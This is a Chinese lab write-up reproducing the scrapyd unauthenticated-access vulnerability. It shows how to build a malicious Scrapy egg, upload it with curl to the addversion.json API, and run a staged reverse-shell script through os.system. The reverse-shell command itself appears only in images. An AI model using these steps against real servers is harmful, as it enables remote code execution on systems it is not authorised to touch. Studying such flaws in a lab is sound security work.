scrapyd 未授权访问漏洞
作者:互联网
scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。
参考链接:https://www.leavesongs.com/PENETRATION/attack-scrapy.html
环境搭建
执行如下命令启动scrapyd服务:
docker-compose up -d
![](https://www.icode9.com/i/l/?n=22&i=blog/2236821/202205/2236821-20220516074752068-1785144892.png)
环境启动后,访问http://your-ip:6800
即可看到Web界面。
![](https://www.icode9.com/i/l/?n=22&i=blog/2236821/202205/2236821-20220516074752026-1615404333.png)
漏洞复现
参考攻击Scrapyd爬虫,构造一个恶意的scrapy包:
pip install scrapy scrapyd-client
scrapy startproject evil
cd evil
# 编辑 evil/__init__.py, 加入恶意代码
![](https://www.icode9.com/i/l/?n=22&i=blog/2236821/202205/2236821-20220516074752025-1179055607.png)
![](https://www.icode9.com/i/l/?n=22&i=blog/2236821/202205/2236821-20220516074752074-421211129.png)
![](https://www.icode9.com/i/l/?n=22&i=blog/2236821/202205/2236821-20220516074752031-288903355.png)
shell.txt内容为反弹Shell命令
![](https://www.icode9.com/i/l/?n=22&i=blog/2236821/202205/2236821-20220516074752021-1950339294.png)
然后,我们用scrapyd-client这个工具,将项目打包成egg包。当然也可以自己用setuptools手工打包。
![](https://www.icode9.com/i/l/?n=22&i=blog/2236821/202205/2236821-20220516074752071-67299041.png)
向API接口发送恶意包:
curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg
![](https://www.icode9.com/i/l/?n=22&i=blog/2236821/202205/2236821-20220516074752032-255202716.png)
此时靶机中已经生成shell.sh,只需将其运行,所以我们再次修改py文件内容,并再次向API接口发送恶意包
import os
os.system('/bin/bash /tmp/shell.sh')
成功反弹Shell:
![](https://www.icode9.com/i/l/?n=22&i=blog/2236821/202205/2236821-20220516074752057-830680307.png)
标签:shell,evil,漏洞,scrapy,6800,授权,egg,scrapyd 来源: https://www.cnblogs.com/NoCirc1e/p/16275594.html